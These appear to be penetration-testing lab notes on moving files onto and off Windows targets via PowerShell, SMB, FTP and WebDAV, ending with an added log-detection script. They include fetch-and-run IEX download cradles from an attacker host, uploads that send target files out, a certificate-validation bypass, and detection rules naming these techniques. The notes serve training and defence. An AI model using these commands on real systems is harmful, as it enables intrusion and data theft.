# PowerShell Base64 String Copy+Paste
```bash
#base64 encode file on Linux
md5sum file #create and save hash to later confirm file integrity after transfer
base64 -w 0 file; echo #output base64 encoded string to stdout on a single line
```
```powershell
#copy+paste encoded string into Windows
[IO.File]::WriteAllBytes("C:\Users\Public\<file_name>", [Convert]::FromBase64String("<string>")) #decode base64 string
Get-FileHash C:\Users\Public\<file_name> -Algorithm md5 #compare against previous hash to confirm integrity
#NOTE: cmd.exe has a maximum string length of 8,191 characters
```
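The copy+paste transfer above relies on two checks: the MD5 taken before and after the transfer must match, and the whole decode one-liner must fit inside cmd.exe's 8,191-character limit. The following Python script is an added example (not part of the original notes) for the Linux side: it builds the same PowerShell one-liner shown above, reports whether it fits, and verifies the hash on the receiving end. The file name, the sample content, and the key=value layout are constructed; the size budget is derived from the 8,191 figure quoted in the notes.

```python
import base64
import hashlib

# Limit quoted in the notes above for a single cmd.exe command line.
CMD_MAX_LINE = 8191


def encoded_length(n_bytes: int) -> int:
    """Length of the base64 text for n_bytes of input: 4 chars per 3-byte group, padded."""
    return 4 * ((n_bytes + 2) // 3)


def max_payload_bytes(limit: int = CMD_MAX_LINE, overhead: int = 0) -> int:
    """Largest raw file whose base64 text, plus `overhead` chars of wrapper, fits in `limit`."""
    return ((limit - overhead) // 4) * 3


def decode_one_liner(file_name: str, b64: str) -> str:
    """The PowerShell decode command from the notes above, with placeholders filled in."""
    return (f'[IO.File]::WriteAllBytes("C:\\Users\\Public\\{file_name}", '
            f'[Convert]::FromBase64String("{b64}"))')


def prepare_for_paste(data: bytes, file_name: str) -> dict:
    """Sender side: encode, hash, and check that the one-liner fits on one cmd.exe line."""
    b64 = base64.b64encode(data).decode("ascii")
    cmd = decode_one_liner(file_name, b64)
    return {
        "b64": b64,
        "md5": hashlib.md5(data).hexdigest(),
        "command": cmd,
        "fits_cmd_line": len(cmd) <= CMD_MAX_LINE,
    }


def integrity_ok(data: bytes, expected_md5: str) -> bool:
    """Receiver side: compare the decoded bytes' MD5 with the hash taken before transfer.
    Get-FileHash prints uppercase hex and md5sum lowercase, so normalise before comparing."""
    return hashlib.md5(data).hexdigest() == expected_md5.lower()


def decode_and_verify(b64: str, expected_md5: str) -> bytes:
    """Decode the pasted string and refuse it if the hash does not match."""
    data = base64.b64decode(b64, validate=True)  # validate=True rejects stray characters
    if not integrity_ok(data, expected_md5):
        raise ValueError("MD5 mismatch: pasted string is truncated or corrupted")
    return data


if __name__ == "__main__":
    sample = b"This is a test file\n"  # constructed sample content
    pkg = prepare_for_paste(sample, "test.txt")  # hypothetical file name
    print(pkg["command"])
    print("fits cmd.exe line:", pkg["fits_cmd_line"])
    print("round trip ok:", decode_and_verify(pkg["b64"], pkg["md5"]) == sample)
    print("max raw bytes with no wrapper text:", max_payload_bytes())
```

Without any wrapper text the limit allows at most 6,141 raw bytes (8,188 base64 characters); the one-liner's own text eats into that budget, so anything bigger has to be transferred some other way from this page.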
# PowerShell Web Download
- typically HTTP and HTTPS are open to outbound traffic
- defender may prevent download of some file types like `shell.exe`
- use the `System.Net.WebClient` class to download over HTTP, HTTPS, or FTP
```bash
#setup http server on Kali host
python3 -m http.server <port>
```
```powershell
(New-Object Net.WebClient).DownloadFile('http://<kali_host_ip>:<port>/<target_file>','<Output File Name>')
#NOTE: target file URL could be on GitHub or hosted by Kali host
```
| WebClient Method    | Description                                                                                 |
| ------------------- | ------------------------------------------------------------------------------------------- |
| OpenRead            | Returns the data from a resource as a stream                                                |
| OpenReadAsync       | Returns the data from a resource without blocking the calling thread                        |
| DownloadData        | Downloads data from a resource and returns a Byte array                                     |
| DownloadDataAsync   | Downloads data from a resource and returns a Byte array without blocking the calling thread |
| DownloadFile        | Downloads data from a resource to a local file                                              |
| DownloadFileAsync   | Downloads data from a resource to a local file without blocking the calling thread          |
| DownloadString      | Downloads a String from a resource and returns a string                                     |
| DownloadStringAsync | Downloads a String from a resource without blocking the calling thread                      |
- PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the [Invoke-Expression](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2) cmdlet or the alias `IEX`
```bash
#setup http server on Kali host
python3 -m http.server <port>
```
```powershell
IEX (New-Object Net.WebClient).DownloadString('http://<kali_host_ip>:<port>/<target_file>') #directly run target file in memory
#alternative to the above cmdlet
(New-Object Net.WebClient).DownloadString('http://<kali_host_ip>:<port>/<target_file>') | IEX #pipeline input from WebClient to IEX
#NOTE: target file URL could be on GitHub or hosted by Kali host
```
- From PowerShell 3.0 onwards, the [Invoke-WebRequest](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2) cmdlet is also available, but it is somewhat slower at downloading files
- The aliases `iwr`, `curl`, and `wget` can be used in place of the full cmdlet name `Invoke-WebRequest`
```bash
#setup http server on Kali host
python3 -m http.server <port>
```
```powershell
Invoke-WebRequest http://<kali_host_ip>:<port>/<target_file> -OutFile file_name.ps1
#NOTE: target file URL could be on GitHub or hosted by Kali host
```
## Common Errors with PowerShell
- When the IE first-launch configuration has not been completed, the download may be prevented. Add the below flag to PS download commands:
- ==Add `-UseBasicParsing` flag to `Invoke-WebRequest` or `IEX`==
- When encountering errors related to the SSL/TLS secure channel because the certificate is not trusted, execute the following PS command and retry the download command (this disables certificate validation for the whole PowerShell session, not just the one request):
- `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}`
# SMB Downloads
- Leverage SMB (TCP/445) to download files to target Windows machine from attacker Kali machine
- First, initialize an SMB server on Kali and host file
- Second, use `copy` or `move` commands with `cmd.exe` OR `Copy-Item` cmdlet with PowerShell to pull file from Kali SMB server
## Create SMB Server on Linux
```bash
sudo impacket-smbserver share -smb2support /tmp/share #host files in /tmp/share via SMB
sudo impacket-smbserver share -smb2support /tmp/share -user test -password test #host files with user_name:password authentication
#impacket-smbserver = smbserver.py
#here 'share' = share name
```
## Copy File from SMB Server
```cmd
copy \\<kali_host_ip>\share\nc.exe
```
## Mount SMB Share with Username:Password Authentication
```cmd
#newer Windows versions disable unauthenticated guest access to shares
net use n: \\<kali_host_ip>\share /user:test test #mount share with user_name:password
copy n:\nc.exe #copy target file from mounted share
```
# FTP Downloads
- Setup FTP server on Kali host
```bash
sudo pip3 install pyftpdlib #install python module if necessary
sudo python3 -m pyftpdlib --port 21 #initialize FTP server and specify port; by default this module uses port 2121
```
- Download files from FTP Server using PowerShell
```powershell
(New-Object Net.WebClient).DownloadFile('ftp://<kali_host_ip>/<target_file>.txt', 'C:\Users\Public\<output_file>.txt')
```
- If we don't have an interactive shell on remote machine to access PowerShell, use the below steps to create an FTP command file to download file from FTP server
```cmd-session
C:\htb> echo open <kali_host_ip> > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo GET <target_file>.txt >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt #command to execute FTP command file
#below are automated steps based on FTP command file
ftp> open <kali_host_ip>
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET <target_file>.txt
ftp> bye
C:\htb> more <target_file>.txt #cat the received file
This is a test file
```
# Upload Operations
- Situations may occur, such as password cracking, analysis, exfiltration, etc., where we must upload files from our target machine onto our Kali host
## PowerShell Base64 Copy+Paste
```powershell
#base64 encode target file on Windows
[Convert]::ToBase64String((Get-Content -Path "C:\Windows\system32\drivers\etc\<target_file>" -Encoding Byte)) #base64 encode target file
Get-FileHash "C:\Windows\system32\drivers\etc\<target_file>" -Algorithm MD5 | select Hash #create and save hash to later confirm file integrity after transfer
```
```bash
#copy+paste encoded string into Kali host
echo <base64_string> | base64 -d > decoded_output #decode base64 string
md5sum decoded_output #compare against previous hash to confirm integrity
```
## PowerShell Web Uploads with PSUpload.ps1
- Configure upload server on Kali host
```bash
#setup upload http server on Kali host
pip3 install uploadserver #install python module for upload server if necessary
python3 -m uploadserver #start http upload server on port 8000 by default
#alternative: install and run the module with pipx
pipx install uploadserver
pipx run uploadserver
```
- Use a PowerShell script [PSUpload.ps1](https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1) which uses `Invoke-RestMethod` to perform the upload operations.
- This script accepts two parameters `-File`, which we use to specify the file path, and `-Uri`, which is the server URL where we'll upload our file
```PowerShell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') #run PSUpload.ps1 in memory
Invoke-FileUpload -Uri http://<kali_host_ip>:8000/upload -File C:\Windows\System32\drivers\etc\<target_file> #use PSUpload.ps1 to move target file to Kali host
```
## PowerShell Web Upload with Invoke-WebRequest and NC
- As an alternative to the above, upload base64-encoded files with `Invoke-WebRequest` or `Invoke-RestMethod` and catch the data with `nc` on the Kali host
```PowerShell
$b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\<target_file>' -Encoding Byte)) #base64 encode target file
Invoke-WebRequest -Uri http://<kali_host_ip>:8000/ -Method POST -Body $b64 #move target file to Kali host
```
```bash
#catch base64 data on Kali host
nc -lvnp 8000 #setup nc listener; the base64 string arrives in the POST body
echo <base64_string> | base64 -d > decoded_output #decode the base64 string and output to a file
```
## Restricted SMB Upload with WebDAV
- Enterprises typically don't allow outbound SMB (TCP/445) from their internal network because this can open them up to potential attacks
- If there are no outbound SMB (TCP/445) restrictions, we can use `impacket-smbserver` for upload operations as we did for download operations
- As a workaround, run SMB over HTTP with WebDAV
- `WebDAV` [(RFC 4918)](https://datatracker.ietf.org/doc/html/rfc4918) is an extension of HTTP that also supports HTTPS
- `WebDAV` enables a webserver to behave like a fileserver, supporting collaborative content authoring
```bash
#setup python modules for WebDAV on Kali host
sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
```
```cmd
#connect to WebDAV share from Windows
dir \\<kali_host_ip>\DavWWWRoot #test access to WebDAV share on Kali host
copy C:\Users\john\Desktop\<target_file>.zip \\<kali_host_ip>\DavWWWRoot\ #upload target file to WebDAV share
#NOTE: DavWWWRoot is a special keyword recognized by the Windows Shell; no such folder exists on the WebDAV server
#The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests, that you are connecting to the root of the WebDAV server
#You can avoid the keyword by specifying a folder that exists on the server when connecting, for example: \\<kali_host_ip>\sharefolder
```
## FTP Uploads
- Setup/start FTP server on Kali host
```bash
sudo pip3 install pyftpdlib #install python module if necessary
sudo python3 -m pyftpdlib --port 21 --write #initialize FTP server for upload with --write flag and specify port; by default this module uses port 2121
```
- Use PowerShell's upload function to upload target file to FTP server
```PowerShell
(New-Object Net.WebClient).UploadFile('ftp://<kali_host_ip>/ftp-hosts', 'C:\Windows\System32\drivers\etc\<target_file>')
```
- If we don't have an interactive shell on remote machine to access PowerShell, use the below steps to create an FTP command file to upload file to FTP server
```cmd
C:\htb> echo open <kali_host_ip> > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\<target_file> >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt #command to execute the ftp command file
#below are automated steps based on FTP command file
ftp> open <kali_host_ip>
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\<target_file>
ftp> bye
```
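Every transfer method on this page (the WebClient download cradles and `IEX` in the web download section, the certificate-validation bypass under common errors, the base64 write-to-disk and read-from-disk one-liners, and the `UploadFile` / `-Method POST -Body` uploads) leaves a recognisable command line in PowerShell Script Block Logging (Event ID 4104). The following Python script is an added example, not part of the original notes, that runs a small rule set over such events and groups the hits by host. The log lines are constructed in a simplified `key=value` layout rather than the real event XML, the hostnames, users and file names are invented, and 203.0.113.5 is a documentation address.

```python
import re

# Rules derived from the commands shown on this page. Each regex is applied to the
# ScriptBlockText field only; order determines the order of rule names in a hit.
RULES = [
    ("webclient_download_cradle",
     r"New-Object\s+(System\.)?Net\.WebClient\b.*\.Download(String|File|Data)\("),
    ("iex_invoke_expression", r"(\bIEX\b|Invoke-Expression)"),
    ("invoke_webrequest_outfile", r"(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b).*-OutFile"),
    ("cert_validation_disabled",
     r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}"),
    ("base64_write_to_disk",
     r"FromBase64String\(.*WriteAllBytes|WriteAllBytes\(.*FromBase64String"),
    ("base64_read_from_disk", r"ToBase64String\(.*Get-Content"),
    ("webclient_upload", r"\.UploadFile\("),
    ("http_post_body", r"(Invoke-WebRequest|Invoke-RestMethod).*-Method\s+POST.*-Body"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

# Constructed sample events (assumed layout: "<event id> host=.. user=.. ScriptBlockText=..").
SAMPLE_LOG = [
    r"4104 host=WS01 user=CORP\jdoe ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5:8080/run.ps1')",
    r"4104 host=WS01 user=CORP\jdoe ScriptBlockText=[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}",
    r"4104 host=WS02 user=CORP\svc_backup ScriptBlockText=Get-ChildItem C:\Backups | Sort-Object LastWriteTime",
    r"4104 host=WS02 user=CORP\jdoe ScriptBlockText=Invoke-WebRequest http://203.0.113.5:8080/tool.ps1 -OutFile C:\Users\Public\tool.ps1",
    r'4104 host=WS01 user=CORP\jdoe ScriptBlockText=[IO.File]::WriteAllBytes("C:\Users\Public\nc.exe", [Convert]::FromBase64String("TVqQAAMAAAAEAAAA"))',
    r"4104 host=WS03 user=CORP\asmith ScriptBlockText=$b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)); Invoke-WebRequest -Uri http://203.0.113.5:8000/ -Method POST -Body $b64",
    r"4104 host=WS03 user=CORP\asmith ScriptBlockText=(New-Object Net.WebClient).UploadFile('ftp://203.0.113.5/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')",
]


def parse_event(line: str):
    """Split one constructed event into (host, user, script block text)."""
    head, _, script = line.partition("ScriptBlockText=")
    fields = dict(tok.split("=", 1) for tok in head.split() if "=" in tok)
    return fields.get("host", "?"), fields.get("user", "?"), script


def scan_text(script: str) -> list:
    """Return the names of every rule that matches a script block."""
    return [name for name, rx in COMPILED if rx.search(script)]


def scan(lines) -> list:
    """Return one hit per event that matched at least one rule."""
    hits = []
    for line in lines:
        host, user, script = parse_event(line)
        matched = scan_text(script)
        if matched:
            hits.append({"host": host, "user": user, "rules": matched, "script": script})
    return hits


def rules_by_host(hits) -> dict:
    """Collapse hits into {host: set(rule names)} so a cradle followed by a
    certificate bypass or a write-to-disk on the same host stands out at triage."""
    summary = {}
    for hit in hits:
        summary.setdefault(hit["host"], set()).update(hit["rules"])
    return summary


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["host"]:5} {hit["user"]:16} {", ".join(hit["rules"])}')
    for host, names in sorted(rules_by_host(scan(SAMPLE_LOG)).items()):
        print(f"{host}: {len(names)} distinct techniques")
```

The rules are deliberately literal so that each maps back to a command on this page; in production they would sit beside the usual evasions (aliases, string concatenation, `-EncodedCommand`) that these notes do not cover, and the benign `Get-ChildItem` line shows the rule set staying quiet on ordinary administration.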